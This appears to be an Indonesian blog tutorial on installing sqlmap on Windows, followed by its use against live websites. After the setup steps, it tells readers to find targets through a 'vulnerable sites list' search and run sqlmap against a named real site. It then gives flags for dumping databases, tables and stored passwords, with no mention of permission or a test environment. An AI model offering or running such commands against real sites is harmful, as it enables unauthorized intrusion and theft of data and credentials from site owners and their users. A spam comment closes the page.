Cara Install dan menjalanlan SQLMAP di Windows

Diposting pada

Dalam posting ini saya akan menunjukkan kepada anda bagaimana cara setup instal dan juga bagaiman cara menjalankan sqlmap di windows. Biasanya SQLMap paling sering di jalankan pada sistem operasi Linux dan sejenisnya.

SQLMap adalah tool yang paling populer untuk eksploitasi otomatis vulnerability SQL Injection dan pengambil alihan(akusisi) database. SQLMap sendiri  adalah cross platform yang ditulis dalam bahasa python. Jika Anda menggunakan Backtrack ataupun kali linux maka sqlmap masuk pada paket di dalamnya..Fungsi SQLMap sendiri adalah untuk melakukan SQL Injection dan mencari kelemahan pada sistem database yang akan di serang. Langsung saja kita menuju step-step proses instalasinya.

Langkah 1 : Download Python

Download terlebih dahulu python, recomendasi saya, menggunakan Python versi 2.7.xx atau 2.6.xx. Bisa di download di disini.

Mungkin ada yang bertanya kenapa harus menginstall python, dikarenkan sqlmap ditulis dalam bahasa python, sehingga langkah pertama yang harus dilakukan adalah menginstall python .

download python

 

Langkah 2 : Install  Python

Silahkan lakukan proses install python-2.7.14.msi sampai selesai,  python  yang saya install adalah versi 2.7.14.

install python langkah 1

install python langkah 2

install python langkah 3

install python langkah 4

selsai install python

 

Langkah 3 :

Selanjutnya unduh file zip sqlmap dari sqlmap.org, atau download disini.

download sqlmap

Langkah 4 : Ekstrak file zip sqlmap

Ekstrak file zip sqlmap kemudian simpan di folder yang gampang dicari misalnya d drive C, agar gampang dijalankan rename foldernya menjadi folder sqlmap saja.

folder sqlmap

Langkah 5 : Menjalankan sqlmap menggunakan CMD (command prompt )

tekan shortkey CTRL + R, kemudian ketik cmd

run cmd

Kemudian masuk ke direktori sqlmap, sql yang saya demokan ini, saya simpan di direktori C.

masuk ke direktori sqlmap

kemudian jalankan sqlmap.py silahkan gunakan script

python sqlmap.py

runnung sqlmap.py

Sqlmap sudah running. tinggal di uji coba.

Jika ingin mencoba sqlmap  menyerang website. silahkan cari contoh di google sqlmap vulnerable sites list

sqlmap vulnerable sites list

 

misalnya kita membuka salah satu situs sqlmap vulnerable sites list, maka kita akan dapatkan link-link yang dapat kita uji coba misalnya saya ambil salah satu website

contoh sqlmap

Kemudian jalankan perintah

sqlmap.py -u http://www.bia2.com/video/player.php?id=13 --dbs

sqlmap running for website

Beberapa perintah yang dapat digunakan selain dari -dbs anda juga bisa gunakan perintah :

--batch --banner
--batch --passwords
--batch --dbs
--batch --tables -D (namadb/schema)
contoh : --batch --tables -D testdb
--batch --dump -T (table) -D namadb/schema
contoh : --batch --dump -T (testtable) -D ntestdba

Sekian tutorial kali ini. semoga bermanfaat 🙂

 

15 thoughts on “Cara Install dan menjalanlan SQLMAP di Windows

  1. yvqaafjvogwYeezy Shoes,Definitely believe that which you said. Your favourite justification appeared to be on the net the simplest thing to remember of.

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *